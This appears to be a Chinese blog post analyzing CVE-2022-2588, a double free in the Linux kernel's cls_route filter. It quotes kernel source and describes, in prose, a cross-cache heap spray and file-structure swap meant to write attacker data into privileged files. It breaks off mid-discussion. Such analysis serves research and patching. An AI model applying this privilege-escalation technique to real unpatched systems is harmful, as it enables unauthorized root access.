CVE-2022-2588复现 | 196082's blog

前言

本来不想分析CVE了，无奈前面提到了内核内部隔离机制，而在往期的文章中只在向pipe_buffer说yes！文章中简要提到过通过实现页级的UAF来实现绕过的，可是还存在一种技术可以绕过，如果不记录下来是真的心痒，所以只能把syzkaller的学习计划往后推推进而来分析这一个利用方法。文件创建时间是10月19号，~~不想写文章了，懒狗症犯了~~

回到正题，这一漏洞出现在流量控制子系统包分类器的cls_route过滤器中，当旧过滤器的句柄为0时，在释放之前内核不会从哈希表中将其删除从而产生的Double Free。

Rtnetlink简述

~~这里直接抄我参考文章的原文，绝对不是我懒得写~~

Rtnetlink是所有内核网络子系统使用的网络连接总线，包括网络接口、路由、fdb和邻居。一些内核网络子系统也在通用netlink总线上提供服务。Linux内核网络子系统使用消息类型和系列向Rtnetlink内核注册处理程序。Rtnetlink允许读取和更改内核的路由表。它在内核中用于在各种子系统之间进行通信，也用于与用户空间程序进行通信。网络路由、IP地址、链接参数、邻居设置、排队规则、流量类别和数据包分类器都可以通过NETLINK_ROUTE套接字进行控制。Rtnetlink由以下消息类型组成（除了标准的netlink消息）：

RTM_NEWLINK、RTM_DELLINK、RTM_GETLINK创建、删除或获取有关特定网络接口的信息。
RTM_NEWADDR、RTM_DELADDR、RTM_GETADDR添加、删除或接收有关与接口关联的IP地址的信息。
RTM_NEWROUTE、RTM_DELROUTE、RTM_GETROUTE创建、删除或接收有关网络路由的信息。
RTM_NEWNEIGH、RTM_DELNEIGH、RTM_GETNEIGH添加、删除或接收有关邻居表条目的信息（例如，ARP条目）。
RTM_NEWRULE、RTM_DELRULE、RTM_GETRULE添加、删除或检索路由规则。
RTM_NEWQDISC、RTM_DELQDISC、RTM_GETQDISC添加、删除或获取排队规则。
RTM_NEWTCLASS、RTM_DELTCLASS、RTM_GETTCLASS添加、删除或获取流量类别。
RTM_NEWTFILTER, RTM_DELTFILTER, RTM_GETTFILTER添加、删除或接收有关流量过滤器的信息。

实现原理

首先，当内核启动加载时会初始化netlink协议，此时会通过调用rtnetlink_init函数初始化路由netlink socket接口

void __init rtnetlink_init(void)
{
	if (register_pernet_subsys(&rtnetlink_net_ops))
		panic("rtnetlink_init: cannot initialize rtnetlink\n");

	register_netdevice_notifier(&rtnetlink_dev_notifier);

	rtnl_register(PF_UNSPEC, RTM_GETLINK, rtnl_getlink,
		      rtnl_dump_ifinfo, 0);
	rtnl_register(PF_UNSPEC, RTM_SETLINK, rtnl_setlink, NULL, 0);
	rtnl_register(PF_UNSPEC, RTM_NEWLINK, rtnl_newlink, NULL, 0);
	rtnl_register(PF_UNSPEC, RTM_DELLINK, rtnl_dellink, NULL, 0);

	rtnl_register(PF_UNSPEC, RTM_GETADDR, NULL, rtnl_dump_all, 0);
	rtnl_register(PF_UNSPEC, RTM_GETROUTE, NULL, rtnl_dump_all, 0);
	rtnl_register(PF_UNSPEC, RTM_GETNETCONF, NULL, rtnl_dump_all, 0);

	rtnl_register(PF_UNSPEC, RTM_NEWLINKPROP, rtnl_newlinkprop, NULL, 0);
	rtnl_register(PF_UNSPEC, RTM_DELLINKPROP, rtnl_dellinkprop, NULL, 0);

	rtnl_register(PF_BRIDGE, RTM_NEWNEIGH, rtnl_fdb_add, NULL, 0);
	rtnl_register(PF_BRIDGE, RTM_DELNEIGH, rtnl_fdb_del, NULL,
		      RTNL_FLAG_BULK_DEL_SUPPORTED);
	rtnl_register(PF_BRIDGE, RTM_GETNEIGH, rtnl_fdb_get, rtnl_fdb_dump, 0);

	rtnl_register(PF_BRIDGE, RTM_GETLINK, NULL, rtnl_bridge_getlink, 0);
	rtnl_register(PF_BRIDGE, RTM_DELLINK, rtnl_bridge_dellink, NULL, 0);
	rtnl_register(PF_BRIDGE, RTM_SETLINK, rtnl_bridge_setlink, NULL, 0);

	rtnl_register(PF_UNSPEC, RTM_GETSTATS, rtnl_stats_get, rtnl_stats_dump,
		      0);
	rtnl_register(PF_UNSPEC, RTM_SETSTATS, rtnl_stats_set, NULL, 0);
}

由上面的代码可以看出来的，主要是通过rtnl_register函数将不同的消息类型和对应的操作进行了绑定，这里简单看一下这个函数定义

void rtnl_register(int protocol, int msgtype,
		   rtnl_doit_func doit, rtnl_dumpit_func dumpit,
		   unsigned int flags)
{
	int err;

	err = rtnl_register_internal(NULL, protocol, msgtype, doit, dumpit,
				     flags);
	if (err)
		pr_err("Unable to register rtnetlink message handler, "
		       "protocol = %d, message type = %d\n", protocol, msgtype);
}

可以发现这个函数其实就是rtnl_register_internal套了一层壳，这里主要关注rtnl_register的参数定义。前面就是协议，消息类型。紧随的这两个分别是两个毁掉函数被传入，而这两个毁掉函数对应的是两种类型，第一种是动作函数，第二种是dump函数dumpit，而从上面的初始化函数来看是有的消息只存在第一个有的只有第二个，还有的两者都有。从前面的简述中看到其实有的消息类型是没被初始化的比如RTM_NEWTFILTER，添加一个流量过滤器，其是在tc_filter_init函数中被初始化的

static int __init tc_filter_init(void)
{
	int err;

	tc_filter_wq = alloc_ordered_workqueue("tc_filter_workqueue", 0);
	if (!tc_filter_wq)
		return -ENOMEM;

	err = register_pernet_subsys(&tcf_net_ops);
	if (err)
		goto err_register_pernet_subsys;

	rtnl_register(PF_UNSPEC, RTM_NEWTFILTER, tc_new_tfilter, NULL,
		      RTNL_FLAG_DOIT_UNLOCKED);
	rtnl_register(PF_UNSPEC, RTM_DELTFILTER, tc_del_tfilter, NULL,
		      RTNL_FLAG_DOIT_UNLOCKED);
	rtnl_register(PF_UNSPEC, RTM_GETTFILTER, tc_get_tfilter,
		      tc_dump_tfilter, RTNL_FLAG_DOIT_UNLOCKED);
	rtnl_register(PF_UNSPEC, RTM_NEWCHAIN, tc_ctl_chain, NULL, 0);
	rtnl_register(PF_UNSPEC, RTM_DELCHAIN, tc_ctl_chain, NULL, 0);
	rtnl_register(PF_UNSPEC, RTM_GETCHAIN, tc_ctl_chain,
		      tc_dump_chain, 0);

	return 0;

err_register_pernet_subsys:
	destroy_workqueue(tc_filter_wq);
	return err;
}

当用户通过NETLINK_ROUTE套接字发送RTM_NEWTFILTER消息用于创建一个流量过滤器时，内核会调用rtnetlink_rcv_msg函数来处理rtnetlink消息

static int rtnetlink_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh,
			     struct netlink_ext_ack *extack)
{
	struct net *net = sock_net(skb->sk);
	struct rtnl_link *link;
	enum rtnl_kinds kind;
	struct module *owner;
	int err = -EOPNOTSUPP;
	rtnl_doit_func doit;
	unsigned int flags;
	int family;
	int type;

	type = nlh->nlmsg_type;
	if (type > RTM_MAX)
		return -EOPNOTSUPP;

	type -= RTM_BASE;

	/* All the messages must have at least 1 byte length */
	if (nlmsg_len(nlh) < sizeof(struct rtgenmsg))
		return 0;

	family = ((struct rtgenmsg *)nlmsg_data(nlh))->rtgen_family;
	kind = rtnl_msgtype_kind(type);

	if (kind != RTNL_KIND_GET && !netlink_net_capable(skb, CAP_NET_ADMIN))
		return -EPERM;

	rcu_read_lock();
	if (kind == RTNL_KIND_GET && (nlh->nlmsg_flags & NLM_F_DUMP)) {
		struct sock *rtnl;
		rtnl_dumpit_func dumpit;
		u32 min_dump_alloc = 0;

		link = rtnl_get_link(family, type);
		if (!link || !link->dumpit) {
			family = PF_UNSPEC;
			link = rtnl_get_link(family, type);
			if (!link || !link->dumpit)
				goto err_unlock;
		}
		owner = link->owner;
		dumpit = link->dumpit;

		if (type == RTM_GETLINK - RTM_BASE)
			min_dump_alloc = rtnl_calcit(skb, nlh);

		err = 0;
		/* need to do this before rcu_read_unlock() */
		if (!try_module_get(owner))
			err = -EPROTONOSUPPORT;

		rcu_read_unlock();

		rtnl = net->rtnl;
		if (err == 0) {
			struct netlink_dump_control c = {
				.dump		= dumpit,
				.min_dump_alloc	= min_dump_alloc,
				.module		= owner,
			};
			err = netlink_dump_start(rtnl, skb, nlh, &c);
			/* netlink_dump_start() will keep a reference on
			 * module if dump is still in progress.
			 */
			module_put(owner);
		}
		return err;
	}

	link = rtnl_get_link(family, type);
	if (!link || !link->doit) {
		family = PF_UNSPEC;
		link = rtnl_get_link(PF_UNSPEC, type);
		if (!link || !link->doit)
			goto out_unlock;
	}

	owner = link->owner;
	if (!try_module_get(owner)) {
		err = -EPROTONOSUPPORT;
		goto out_unlock;
	}

	flags = link->flags;
	if (kind == RTNL_KIND_DEL && (nlh->nlmsg_flags & NLM_F_BULK) &&
	    !(flags & RTNL_FLAG_BULK_DEL_SUPPORTED)) {
		NL_SET_ERR_MSG(extack, "Bulk delete is not supported");
		goto err_unlock;
	}

	if (flags & RTNL_FLAG_DOIT_UNLOCKED) {
		doit = link->doit;
		rcu_read_unlock();
		if (doit)
			err = doit(skb, nlh, extack);
		module_put(owner);
		return err;
	}
	rcu_read_unlock();

	rtnl_lock();
	link = rtnl_get_link(family, type);
	if (link && link->doit)
		err = link->doit(skb, nlh, extack);
	rtnl_unlock();

	module_put(owner);

	return err;

out_unlock:
	rcu_read_unlock();
	return err;

err_unlock:
	rcu_read_unlock();
	return -EOPNOTSUPP;
}

可以看到函数的主要逻辑，首先是在消息中取出其family和type，紧接着根绝family和type回去到link。在最后调用link->doit(skb, nlh, extack)，由前面的函数可以得知的是其会调用如下函数

static int tc_new_tfilter(struct sk_buff *skb, struct nlmsghdr *n,
			  struct netlink_ext_ack *extack)
{
	struct net *net = sock_net(skb->sk);
	struct nlattr *tca[TCA_MAX + 1];
	char name[IFNAMSIZ];
	struct tcmsg *t;
	u32 protocol;
	u32 prio;
	bool prio_allocate;
	u32 parent;
	u32 chain_index;
	struct Qdisc *q;
	struct tcf_chain_info chain_info;
	struct tcf_chain *chain;
	struct tcf_block *block;
	struct tcf_proto *tp;
	unsigned long cl;
	void *fh;
	int err;
	int tp_created;
	bool rtnl_held = false;
	u32 flags;

	if (!netlink_ns_capable(skb, net->user_ns, CAP_NET_ADMIN))
		return -EPERM;

replay:
	tp_created = 0;

	err = nlmsg_parse_deprecated(n, sizeof(*t), tca, TCA_MAX,
				     rtm_tca_policy, extack);
	if (err < 0)
		return err;

	t = nlmsg_data(n);
	protocol = TC_H_MIN(t->tcm_info);
	prio = TC_H_MAJ(t->tcm_info);
	prio_allocate = false;
	parent = t->tcm_parent;
	tp = NULL;
	cl = 0;
	block = NULL;
	q = NULL;
	chain = NULL;
	flags = 0;

	if (prio == 0) {
		/* If no priority is provided by the user,
		 * we allocate one.
		 */
		if (n->nlmsg_flags & NLM_F_CREATE) {
			prio = TC_H_MAKE(0x80000000U, 0U);
			prio_allocate = true;
		} else {
			NL_SET_ERR_MSG(extack, "Invalid filter command with priority of zero");
			return -ENOENT;
		}
	}

	/* Find head of filter chain. */

	err = __tcf_qdisc_find(net, &q, &parent, t->tcm_ifindex, false, extack);
	if (err)
		return err;

	if (tcf_proto_check_kind(tca[TCA_KIND], name)) {
		NL_SET_ERR_MSG(extack, "Specified TC filter name too long");
		err = -EINVAL;
		goto errout;
	}

	/* Take rtnl mutex if rtnl_held was set to true on previous iteration,
	 * block is shared (no qdisc found), qdisc is not unlocked, classifier
	 * type is not specified, classifier is not unlocked.
	 */
	if (rtnl_held ||
	    (q && !(q->ops->cl_ops->flags & QDISC_CLASS_OPS_DOIT_UNLOCKED)) ||
	    !tcf_proto_is_unlocked(name)) {
		rtnl_held = true;
		rtnl_lock();
	}

	err = __tcf_qdisc_cl_find(q, parent, &cl, t->tcm_ifindex, extack);
	if (err)
		goto errout;

	block = __tcf_block_find(net, q, cl, t->tcm_ifindex, t->tcm_block_index,
				 extack);
	if (IS_ERR(block)) {
		err = PTR_ERR(block);
		goto errout;
	}
	block->classid = parent;

	chain_index = tca[TCA_CHAIN] ? nla_get_u32(tca[TCA_CHAIN]) : 0;
	if (chain_index > TC_ACT_EXT_VAL_MASK) {
		NL_SET_ERR_MSG(extack, "Specified chain index exceeds upper limit");
		err = -EINVAL;
		goto errout;
	}
	chain = tcf_chain_get(block, chain_index, true);
	if (!chain) {
		NL_SET_ERR_MSG(extack, "Cannot create specified filter chain");
		err = -ENOMEM;
		goto errout;
	}

	mutex_lock(&chain->filter_chain_lock);
	tp = tcf_chain_tp_find(chain, &chain_info, protocol,
			       prio, prio_allocate);
	if (IS_ERR(tp)) {
		NL_SET_ERR_MSG(extack, "Filter with specified priority/protocol not found");
		err = PTR_ERR(tp);
		goto errout_locked;
	}

	if (tp == NULL) {
		struct tcf_proto *tp_new = NULL;

		if (chain->flushing) {
			err = -EAGAIN;
			goto errout_locked;
		}

		/* Proto-tcf does not exist, create new one */

		if (tca[TCA_KIND] == NULL || !protocol) {
			NL_SET_ERR_MSG(extack, "Filter kind and protocol must be specified");
			err = -EINVAL;
			goto errout_locked;
		}

		if (!(n->nlmsg_flags & NLM_F_CREATE)) {
			NL_SET_ERR_MSG(extack, "Need both RTM_NEWTFILTER and NLM_F_CREATE to create a new filter");
			err = -ENOENT;
			goto errout_locked;
		}

		if (prio_allocate)
			prio = tcf_auto_prio(tcf_chain_tp_prev(chain,
							       &chain_info));

		mutex_unlock(&chain->filter_chain_lock);
		tp_new = tcf_proto_create(name, protocol, prio, chain,
					  rtnl_held, extack);
		if (IS_ERR(tp_new)) {
			err = PTR_ERR(tp_new);
			goto errout_tp;
		}

		tp_created = 1;
		tp = tcf_chain_tp_insert_unique(chain, tp_new, protocol, prio,
						rtnl_held);
		if (IS_ERR(tp)) {
			err = PTR_ERR(tp);
			goto errout_tp;
		}
	} else {
		mutex_unlock(&chain->filter_chain_lock);
	}

	if (tca[TCA_KIND] && nla_strcmp(tca[TCA_KIND], tp->ops->kind)) {
		NL_SET_ERR_MSG(extack, "Specified filter kind does not match existing one");
		err = -EINVAL;
		goto errout;
	}

	fh = tp->ops->get(tp, t->tcm_handle);

	if (!fh) {
		if (!(n->nlmsg_flags & NLM_F_CREATE)) {
			NL_SET_ERR_MSG(extack, "Need both RTM_NEWTFILTER and NLM_F_CREATE to create a new filter");
			err = -ENOENT;
			goto errout;
		}
	} else if (n->nlmsg_flags & NLM_F_EXCL) {
		tfilter_put(tp, fh);
		NL_SET_ERR_MSG(extack, "Filter already exists");
		err = -EEXIST;
		goto errout;
	}

	if (chain->tmplt_ops && chain->tmplt_ops != tp->ops) {
		NL_SET_ERR_MSG(extack, "Chain template is set to a different filter kind");
		err = -EINVAL;
		goto errout;
	}

	if (!(n->nlmsg_flags & NLM_F_CREATE))
		flags |= TCA_ACT_FLAGS_REPLACE;
	if (!rtnl_held)
		flags |= TCA_ACT_FLAGS_NO_RTNL;
	err = tp->ops->change(net, skb, tp, cl, t->tcm_handle, tca, &fh,
			      flags, extack);
	if (err == 0) {
		tfilter_notify(net, skb, n, tp, block, q, parent, fh,
			       RTM_NEWTFILTER, false, rtnl_held);
		tfilter_put(tp, fh);
		/* q pointer is NULL for shared blocks */
		if (q)
			q->flags &= ~TCQ_F_CAN_BYPASS;
	}

errout:
	if (err && tp_created)
		tcf_chain_tp_delete_empty(chain, tp, rtnl_held, NULL);
errout_tp:
	if (chain) {
		if (tp && !IS_ERR(tp))
			tcf_proto_put(tp, rtnl_held, NULL);
		if (!tp_created)
			tcf_chain_put(chain);
	}
	tcf_block_release(q, block, rtnl_held);

	if (rtnl_held)
		rtnl_unlock();

	if (err == -EAGAIN) {
		/* Take rtnl lock in case EAGAIN is caused by concurrent flush
		 * of target chain.
		 */
		rtnl_held = true;
		/* Replay the request. */
		goto replay;
	}
	return err;

errout_locked:
	mutex_unlock(&chain->filter_chain_lock);
	goto errout;
}

这里简单说一下上面函数的逻辑，首先通过tcf_proto_check_kind(tca[TCA_KIND], name)获取过滤器的名字，随后通过tp = tcf_chain_tp_find(chain, &chain_info, protocol, prio, prio_allocate)获取指定协议的过滤器tp，如果tp为null则会创建新的tp，这里通过tp_new = tcf_proto_create(name, protocol, prio, chain, rtnl_held, extack);函数进行创建

static struct tcf_proto *tcf_proto_create(const char *kind, u32 protocol,
					  u32 prio, struct tcf_chain *chain,
					  bool rtnl_held,
					  struct netlink_ext_ack *extack)
{
	struct tcf_proto *tp;
	int err;

	tp = kzalloc(sizeof(*tp), GFP_KERNEL);
	if (!tp)
		return ERR_PTR(-ENOBUFS);

	tp->ops = tcf_proto_lookup_ops(kind, rtnl_held, extack);
	if (IS_ERR(tp->ops)) {
		err = PTR_ERR(tp->ops);
		goto errout;
	}
	tp->classify = tp->ops->classify;
	tp->protocol = protocol;
	tp->prio = prio;
	tp->chain = chain;
	spin_lock_init(&tp->lock);
	refcount_set(&tp->refcnt, 1);

	err = tp->ops->init(tp);
	if (err) {
		module_put(tp->ops->owner);
		goto errout;
	}
	return tp;

errout:
	kfree(tp);
	return ERR_PTR(err);
}

首先是为tp分配了一个object随后通过tcf_proto_lookup_ops函数根据kind获取到对应的ops

static const struct tcf_proto_ops *__tcf_proto_lookup_ops(const char *kind)
{
	const struct tcf_proto_ops *t, *res = NULL;

	if (kind) {
		read_lock(&cls_mod_lock);
		list_for_each_entry(t, &tcf_proto_base, head) {
			if (strcmp(kind, t->kind) == 0) {
				if (try_module_get(t->owner))
					res = t;
				break;
			}
		}
		read_unlock(&cls_mod_lock);
	}
	return res;
}

这里以route为例子

static struct tcf_proto_ops cls_route4_ops __read_mostly = {
	.kind		=	"route",
	.classify	=	route4_classify,
	.init		=	route4_init,
	.destroy	=	route4_destroy,
	.get		=	route4_get,
	.change		=	route4_change,
	.delete		=	route4_delete,
	.walk		=	route4_walk,
	.dump		=	route4_dump,
	.bind_class	=	route4_bind_class,
	.owner		=	THIS_MODULE,
};

上面的ops将会获得如上cls_route4_ops结构体随后会调用tp->ops->init(tp)进行初始化

static int route4_init(struct tcf_proto *tp)
{
	struct route4_head *head;

	head = kzalloc(sizeof(struct route4_head), GFP_KERNEL);
	if (head == NULL)
		return -ENOBUFS;

	rcu_assign_pointer(tp->root, head);
	return 0;
}

可以看到该函数会生成一个route4_head结构体，此结构体的作用是用于存放过滤器对应的哈希值。

接着回到tc_new_tfilter函数，其会将新生成的tp加入到chain中。接下来就会通过fh = tp->ops->get(tp, t->tcm_handle)语句调用对应的get函数，根据tcm_handle获取到过滤器

static void *route4_get(struct tcf_proto *tp, u32 handle)
{
	struct route4_head *head = rtnl_dereference(tp->root);
	struct route4_bucket *b;
	struct route4_filter *f;
	unsigned int h1, h2;

	h1 = to_hash(handle);
	if (h1 > 256)
		return NULL;

	h2 = from_hash(handle >> 16);
	if (h2 > 32)
		return NULL;

	b = rtnl_dereference(head->table[h1]);
	if (b) {
		for (f = rtnl_dereference(b->ht[h2]);
		     f;
		     f = rtnl_dereference(f->next))
			if (f->handle == handle)
				return f;
	}
	return NULL;
}

这里会根据handle从route4_head链表中获取对应的route4_filter。如果返回为空，会接着进入到tc_new_tfilter函数的后续流程，最终在tp->ops->change(net, skb, tp, cl, t->tcm_handle, tca, &fh, flags, extack)语句调用change函数创建一个新的过滤器。

漏洞分析

漏洞出现在route4_change函数中

static int route4_change(struct net *net, struct sk_buff *in_skb,
			 struct tcf_proto *tp, unsigned long base, u32 handle,
			 struct nlattr **tca, void **arg, u32 flags,
			 struct netlink_ext_ack *extack)
{
	struct route4_head *head = rtnl_dereference(tp->root);
	struct route4_filter __rcu **fp;
	struct route4_filter *fold, *f1, *pfp, *f = NULL;
	struct route4_bucket *b;
	struct nlattr *opt = tca[TCA_OPTIONS];
	struct nlattr *tb[TCA_ROUTE4_MAX + 1];
	unsigned int h, th;
	int err;
	bool new = true;

	if (opt == NULL)
		return handle ? -EINVAL : 0;

	err = nla_parse_nested_deprecated(tb, TCA_ROUTE4_MAX, opt,
					  route4_policy, NULL);
	if (err < 0)
		return err;

	fold = *arg;
	if (fold && handle && fold->handle != handle)
			return -EINVAL;

	err = -ENOBUFS;
	f = kzalloc(sizeof(struct route4_filter), GFP_KERNEL);
	if (!f)
		goto errout;

	err = tcf_exts_init(&f->exts, net, TCA_ROUTE4_ACT, TCA_ROUTE4_POLICE);
	if (err < 0)
		goto errout;

	if (fold) {
		f->id = fold->id;
		f->iif = fold->iif;
		f->res = fold->res;
		f->handle = fold->handle;

		f->tp = fold->tp;
		f->bkt = fold->bkt;
		new = false;
	}

	err = route4_set_parms(net, tp, base, f, handle, head, tb,
			       tca[TCA_RATE], new, flags, extack);
	if (err < 0)
		goto errout;

	h = from_hash(f->handle >> 16);
	fp = &f->bkt->ht[h];
	for (pfp = rtnl_dereference(*fp);
	     (f1 = rtnl_dereference(*fp)) != NULL;
	     fp = &f1->next)
		if (f->handle < f1->handle)
			break;

	tcf_block_netif_keep_dst(tp->chain->block);
	rcu_assign_pointer(f->next, f1);
	rcu_assign_pointer(*fp, f);

	if (fold && fold->handle && f->handle != fold->handle) {
		th = to_hash(fold->handle);
		h = from_hash(fold->handle >> 16);
		b = rtnl_dereference(head->table[th]);
		if (b) {
			fp = &b->ht[h];
			for (pfp = rtnl_dereference(*fp); pfp;
			     fp = &pfp->next, pfp = rtnl_dereference(*fp)) {
				if (pfp == fold) {
					rcu_assign_pointer(*fp, fold->next);
					break;
				}
			}
		}
	}

	route4_reset_fastmap(head);
	*arg = f;
	if (fold) {
		tcf_unbind_filter(tp, &fold->res);
		tcf_exts_get_net(&fold->exts);
		tcf_queue_work(&fold->rwork, route4_delete_filter_work);
	}
	return 0;

errout:
	if (f)
		tcf_exts_destroy(&f->exts);
	kfree(f);
	return err;
}

简单分析一下，这里会进一步解析数据包，通过fold = *arg;语句拿出route4_filter，然后判断是否存在，是否handle，handle是否一致，因为是第一次创建这里的fold为空。接着会通过f = kzalloc(sizeof(struct route4_filter), GFP_KERNEL)创建一个结构体，并对其调用tcf_exts_init函数进行初始化

static inline int tcf_exts_init(struct tcf_exts *exts, struct net *net,
				int action, int police)
{
#ifdef CONFIG_NET_CLS_ACT
	exts->type = 0;
	exts->nr_actions = 0;
	/* Note: we do not own yet a reference on net.
	 * This reference might be taken later from tcf_exts_get_net().
	 */
	exts->net = net;
	exts->actions = kcalloc(TCA_ACT_MAX_PRIO, sizeof(struct tc_action *),
				GFP_KERNEL);
	if (!exts->actions)
		return -ENOMEM;
#endif
	exts->action = action;
	exts->police = police;
	return 0;
}

从上述看书可以看到如果内核开启了CONFIG_NET_CLS_ACT选项就会对其分配actions成员，分配的大小是256字节。完毕之后回到route4_change中，如果fold存在，则会将其数据域复制给f。随后调用route4_set_parms函数设置其他参数，后面将新创建的route4_filter的hash值放到对应的route4_head中。

接下来进入if (fold && fold->handle && f->handle != fold->handle) {分支中删除掉旧的route4_filter的哈希值，当然在第一次运行时这里是不会进入的。

在最后判断fold是否为空，如果不为空则调用tcf_queue_work函数对其进行释放操作

bool tcf_queue_work(struct rcu_work *rwork, work_func_t func)
{
	INIT_RCU_WORK(rwork, func);
	return queue_rcu_work(tc_filter_wq, rwork);
}
EXPORT_SYMBOL(tcf_queue_work);

这个函数是个rcu回调，这里就看他的回调函数即可

static void __route4_delete_filter(struct route4_filter *f)
{
	tcf_exts_destroy(&f->exts);
	tcf_exts_put_net(&f->exts);
	kfree(f);
}

static void route4_delete_filter_work(struct work_struct *work)
{
	struct route4_filter *f = container_of(to_rcu_work(work),
					       struct route4_filter,
					       rwork);
	rtnl_lock();
	__route4_delete_filter(f);
	rtnl_unlock();
}

可以其函数实现就是删除对应的成员之后删除掉f。

通过上述流程看起来还是蛮正常的，这里出现问题的地方在清除hash和最后释放结构体的if条件不一致导致的。可以注意到的是在前面清楚哈希值时会判断其handle是否存在，如果不存在则不会进入。但是后面只是判断了fold是否存在，如果我们创建一个handle为0的过滤器则不会进入到上面的分支中只会进入到下面的分支中，从而导致其索引还残留在route4_head中。

static int route4_delete(struct tcf_proto *tp, void *arg, bool *last,
			 bool rtnl_held, struct netlink_ext_ack *extack)
{
	struct route4_head *head = rtnl_dereference(tp->root);
	struct route4_filter *f = arg;
	struct route4_filter __rcu **fp;
	struct route4_filter *nf;
	struct route4_bucket *b;
	unsigned int h = 0;
	int i, h1;

	if (!head || !f)
		return -EINVAL;

	h = f->handle;
	b = f->bkt;

	fp = &b->ht[from_hash(h >> 16)];
	for (nf = rtnl_dereference(*fp); nf;
	     fp = &nf->next, nf = rtnl_dereference(*fp)) {
		if (nf == f) {
			/* unlink it */
			RCU_INIT_POINTER(*fp, rtnl_dereference(f->next));

			/* Remove any fastmap lookups that might ref filter
			 * notice we unlink'd the filter so we can't get it
			 * back in the fastmap.
			 */
			route4_reset_fastmap(head);

			/* Delete it */
			tcf_unbind_filter(tp, &f->res);
			tcf_exts_get_net(&f->exts);
			tcf_queue_work(&f->rwork, route4_delete_filter_work);

			/* Strip RTNL protected tree */
			for (i = 0; i <= 32; i++) {
				struct route4_filter *rt;

				rt = rtnl_dereference(b->ht[i]);
				if (rt)
					goto out;
			}

			/* OK, session has no flows */
			RCU_INIT_POINTER(head->table[to_hash(h)], NULL);
			kfree_rcu(b, rcu);
			break;
		}
	}

out:
	*last = true;
	for (h1 = 0; h1 <= 256; h1++) {
		if (rcu_access_pointer(head->table[h1])) {
			*last = false;
			break;
		}
	}

	return 0;
}

这里再次关注ops中的route4_delete函数，这个函数的作用是释放所有的过滤器，这里使用的依旧是route4_delete_filter_work函数进行删除的，由于前面提到的route4_head中仍然残存handle为0的过滤器的哈希值，因此会对route4_filter和route4_filter->exts->actions对象存在double free。

漏洞利用

(这里的利用机制我没有在文章中提过，但等我看完了发现我以前在适配CVE-2023-3269的时候学过T_T，~~属于是白忙活一场了~~)

既然以前的文章中没提到这里就详细介绍一下，既然这篇文章介绍了那就不再写今年那个CVE的分析文章了。

cross-cache

在前面提到，这一利用手法是用于解决内核内部隔离存在的，在CVE-2023-3269的这篇文章中则是用于绕过NUMA机制使用的，只不过在StackRot利用条件更为苛刻，在把这一手法讲解完毕之后简单提一下。

在前面的一篇文章中详细的解释了内核中的内部隔离机制，大家应该也已经知道了GFP_KERNEL_ACCOUNT标识位和GFP_KERNEL标识位去申请object的时候会从不同的cache中去取。

说到本篇文章，我们前面提到的可以对两个对象进行Double free，其分别是route4_filter和route4_filter->exts->actions，这里主要关注他们的大小，其分别是144和256，会从不同的cache中去取，分别是kmalloc-192和kmalloc-256。而在内核的默认配置中file结构体的大小正好为256，自然而然可以联想到，如果首先使用一个可写的文件占据此位置，再释放掉再使用我们目标的文件去占取再通过某些手法是否可以达成类似于dirty pipe一样的效果呢？

这里先不考虑后续写的手法，从开始用file结构体开始考虑就会发现内核在分配file结构体时会从一个专属的缓存中取出(类似于cred结构体的分配)，所以这时就不得不考虑cross_cache了。

众所周知，在内核中管理内存方式主要是两种一是slub用于分配较小的object，其次是buddy system机制用于分配页面。当某一个slab page被释放时会被buddy system回收，在后续的某个时间可能会被重用，然而重用就可能导致不同的cache从同一个页中取出了用一个位置的object交由其他内容使用。而cross-cache利用方法则是利用上述这一机制进行的，当某一slab page中的所有内存槽被释放，那么这个slab page会被强制释放给buddy system，此时如果堆喷另一种类型的对象且其对应的缓存耗尽则会向buddy system申请新的内存页，如果恰好使用了我们前面恶意强制释放的slab page则可实现攻击。(此处的重用机制在下文有详解，为什么不在这写是因为下面分析CVE是我临时起意的)

将此方法运用到这一环境中很容易可以想到首先通过大量堆喷basic_filter结构体完成内存布局，随后分配一个route4_filter结构体随后继续堆喷basic_filter结构体，那么此时就很有可能一个页面中只存在basic_filter->exts->actions和route4_filter->exts->actions，如果控制将这个页面中的结构体对应basic_filter和route4_filter全部释放掉那么这个页面则会被强制释放进入buddy system中。再堆喷大量的正常文件使其成功占领我的UAF object，至此我们仍不知道到底是什么位置或是那个文件描述符占据了我们目标位置，所以这里使用漏洞产生double free再一次堆喷大量正常文件来占据刚刚的空洞，随后通过kcmp系统调用即可找到我们共享文件描述符的位置了。

延长时间窗口

前面只提到了可以找到共享文件描述符的位置了，没有继续往后写了，因为这里会遇到一个新的问题了，这里先讲后续的步骤写出来。

首先，我们已经拿到了目标文件描述符，并且是两个，那我们可以依照常识进行尝试就是我们对其中一个文件描述符中进行写入，对另一个文件描述符写入恶意字符，此时再将两个文件描述符都关闭( 因为都在使用所以此处的引用计数器为2 )，此时再大量堆喷去打开目标特权文件，有一定的几率让特权文件的file结构体会覆盖掉原本的空洞，从而导致后面的恶意字符写入到了特权文件中去了。

通过前面简要的说明可以看出来这里是存在一个条件竞争的关系，需要在第一个写入垃圾字符，第二个写入恶意字符还没写入时完成偷梁换柱的戏码，看过上一篇文章的朋友可能就会想到使用fuse即可实现，虽然从理论上讲是可以的，但其最终都会利用到内核实现的write的机制。

ssize_t vfs_write(struct file *file, const char __user *buf, size_t count, loff_t *pos)
{
	ssize_t ret;

	if (!(file->f_mode & FMODE_WRITE))
		return -EBADF;
	if (!(file->f_mode & FMODE_CAN_WRITE))
		return -EINVAL;
	if (unlikely(!access_ok(buf, count)))
		return -EFAULT;

	ret = rw_verify_area(WRITE, file, pos, count);
	if (ret)
		return ret;
	if (count > MAX_RW_COUNT)
		count =  MAX_RW_COUNT;
	file_start_write(file);
	if (file->f_op->write)
		ret = file->f_op->write(file, buf, count, pos);
	else if (file->f_op->write_iter)
		ret = new_sync_write(file, buf, count, pos);
	else
		ret = -EINVAL;
	if (ret > 0) {
		fsnotify_modify(file);
		add_wchar(current, ret);
	}
	inc_syscw(current);
	file_end_write(file);
	return ret;
}

在经过几层调用，write会进入到上述函数中，可以看到在函数的开头部分会检查该文件是否可以写入随后执行file_start_write然后调用ops中的write最后执行file_end_write。

static inline void file_start_write(struct file *file)
{
	if (!S_ISREG(file_inode(file)->i_mode))
		return;
	sb_start_write(file_inode(file)->i_sb);
}

static inline void file_end_write(struct file *file)
{
	if (!S_ISREG(file_inode(file)->i_mode))
		return;
	__sb_end_write(file_inode(file)->i_sb, SB_FREEZE_WRITE);
}

